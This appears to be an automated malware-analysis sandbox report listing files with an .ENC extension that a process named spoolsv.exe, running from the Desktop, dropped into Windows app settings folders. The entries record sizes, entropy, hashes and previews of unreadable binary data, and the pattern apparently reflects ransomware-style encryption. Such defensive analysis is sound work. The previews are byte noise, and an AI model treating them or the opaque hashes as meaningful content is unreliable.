                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.976342770848055
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:D2V0tmlP0bAU/swwosX6uKzkVC0brJ3I3UhqSWcWgZr3m+d:M0ml+dkwwowakVDrJlVvZr3n
                                                                                                                                                                                                                                                      MD5:C75F6B3D4165CD11201550AA3B41E334
                                                                                                                                                                                                                                                      SHA1:9C512C69FF6428006497B294CE8115A06AABFB80
                                                                                                                                                                                                                                                      SHA-256:9638169503509268CD6784FE78B61D0F07637B365028A224979603ABE1BA49AF
                                                                                                                                                                                                                                                      SHA-512:7DBAE1D760DB3D93AF1A58D63C993654EB1881599319230DD51D80CC2B1551DB603B1463E03BAA905F035AF160C94731AE8D3EF8EF2065A6124A6491CD50738D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:^DA...6.w$.e1...+.;...N.....w.n.....N...!P.c(...J.A.g..Y.X.E.(J...H&..A.........|...`.E.fR..w.-.V>s_.?.yB.6....E.F....4.O.?...\.-.bQk..3fB8.oq...b.......P.Uu#?Z.....i$fH...Da$...Z.Vlb..9...Uq.Q.2.0X.H.p.@...^..m.o.N.....]...;.C..n2.'.V.....'0..r..J.U.a.....'~C.;i...RE...G_....G......[..,k.t..h..+..F..Dc\....p...|p#...X.`.w..tR]...o.......2....JlpTX....fUg(.Y[j.....W.Yz....P..n :.s....T....n..)w..M.'\.....gC=s?b..B....L.....t.~... ........+U..d.`...^.[k:.V.........V...=*.O....2.w.`..c%o..8~...c.y.*.7....fVS......].B.fU..W..t,...c..nv.[.C.td...;E..+.KQ....2...."..,q..+c.....5....^.-.6._..d......Ak.z.y...E.,..bH.G.........TA...R.{..@...S{.w...!.bT.....dw.;5_....I..=..`.D.9._...W&.r}.".I.XC..i.......|..<...*}..M.W.s...7s...=....Q.e. .&.Ly.^j..2....b..k.2..;....Y0,).0~7wZE.]f..Xa.)01.k]Y/......a..9..........3.kT.3Qc.....2.p.......AR.<......Q...,.....2.....<...uH.HK..=..Q^...+<.-3U.....3.5XjCY.V...2.".....ug....U9..C...t.D#.+.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.979307453313489
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:uV2eM9oc1C/OITd0dezQh/+nl/tgZSpK6fdOpLqw:kPM9BC/pTOozQEl/qUK6fdVw
                                                                                                                                                                                                                                                      MD5:2CB55396D1B6CC735F642C0EE0B12291
                                                                                                                                                                                                                                                      SHA1:6609E63E971BC3D7C67C03F2EABCFF78DEB4678B
                                                                                                                                                                                                                                                      SHA-256:EC8CBF0AAD1CA3F19CF89A668AEB819A86B5175ADE9C528DDC9963F664F92671
                                                                                                                                                                                                                                                      SHA-512:C4D6BBB29EC59E712CB77F775F20001805CF7C711D4C82607920BC3CDA8349E90B0477C4BCAB89375A97CFDA4353778A1067A71CA596248E541C6A394FEE58E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..s..T.6.4.&..`$F.w!..-y...~...q.?.z....M.....+...o.E.t..w..?..5.........b.J.,...6.........P.m......P.5.p....r...?.^.a.C.......=`$........6".Bc...3_1G....m..h..ekhZB[C .K.97=.....b>..}_.n"....a3...M.;YN.1..zL.o..5...lD3+!........D..(g.^.Ry.>..z....(o.@...>8.u_&..Se.F......[ng.....uM..;J.....V.....pE.S;..W.k.....Ph..b...t.uy....>>....,O.r_.;z.m....t..o.:m.t..}oH..z...h+-......6e.........=n..{..o....*...<.cg.rB:.*.@.1h....M...m.t.t.r.[f/u.V.yY%......V..o.....b3..r...<....p.).`...S.7...:..R...R........l]i...Xw.j)........./.F.:..`M..H.E......%...........7...!9..^....:B.$st..3.J......>.?....}.....Y..l...,... n.[.P55.I.-E..NwO.%5r;..A.zf......B...Mn.,.^..f.f.+.w...gZ..`C.\.7..sp=]M.?.Z....l.U9.R...wh.....n._.:.=u.].).k...$!9..l#.|..L/.8SV9......"...e.R..3lE.p.QL.W..Nnu..bJ..4.f.Z.2....g.VM...%o./VxK....#.Rk.......?.;DW.m.t7.Z...H..|j.H..S...dG.]...x...;X.[...'R.....%.,EL...7.t.....j{.D........<.%`$.!.....+kM..Cm...|..-.......n<..-....9....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.972590433206988
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:tM++aSKNc6IyKNMmOYxC6/M1Bzw6+LYYvnTYbd:tVSCxKN7OYk1BuvMR
                                                                                                                                                                                                                                                      MD5:1B92E669C7BFB99C08E6F4D4DE6615AD
                                                                                                                                                                                                                                                      SHA1:85D7918A8FE68C54707ED93715253237489FF284
                                                                                                                                                                                                                                                      SHA-256:00B2DEB7104ABC3C93914C4FCABF1A93A6CFC48EC766D52B01595CB607A50925
                                                                                                                                                                                                                                                      SHA-512:CD3D7CEA9E0D42C7B8DF1C52BC3AF234E9BBD1ADA14B16F07AB984440F131A7279248641E95F0097B4587EF0C8C627C4BFB76B5260F6A2343342578B1C41C4C1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:?.C`...g#.......{Y}B.*..GI.q.G]...r{}.1..D....6.Q.y......2.'*..G..v.7UA.4.9S.....-......}.n....2..\k..5.]_ \..ul.0....8,.)$...Ge..M=. ....a...fNq.....N...O*...-..NEI...R}v;@.....Ej_hGQZ}`.......P..h...<....j....'..;.L.....UL...<....b..P.B.A..a.w.^N0.O..9..D..~....g...C .u....O.(..G.&....IW.1..^.E.^.T....+*c.NK..C.nKyW.$.Bt...E...&......=....&h.(9.9.. .l%..Z...Jf7.....>T.~..v.....'..pCl.2..*].0AG(..".Sv.A....0...M..f/.RS.....+<...uJ...'..t1...l....W..*.6.mn..\....D..'F..@.K....E.]E.CN...l.<...k.v..G.'.WC.....;. .......}#>..ZG._..a.....Tn.J.8C.U....(.%F....k.M8.g...].".~.....^.j..e.......c@{^..h..I....b<..1<..=..YH..?T..|. .))...8......1....y.D.. ~.J.. (.....E.......f.f......yR{G....4r.....^2.xp....;.......*.^|..o.....O....`}..*C.A....`....`h./*..[..'p.F+#yv.~..\....2..|.......}..@.j....q......K..v................4m...l...B%.....R..&...e3.....Xp.ZtOM08.8.C....6.n.&U.."3...."@..$6.A.E.'.....H/...N....2;.F[.a.....e.o.i\Q..$.....a.{R.J/'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\roaming.lock.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
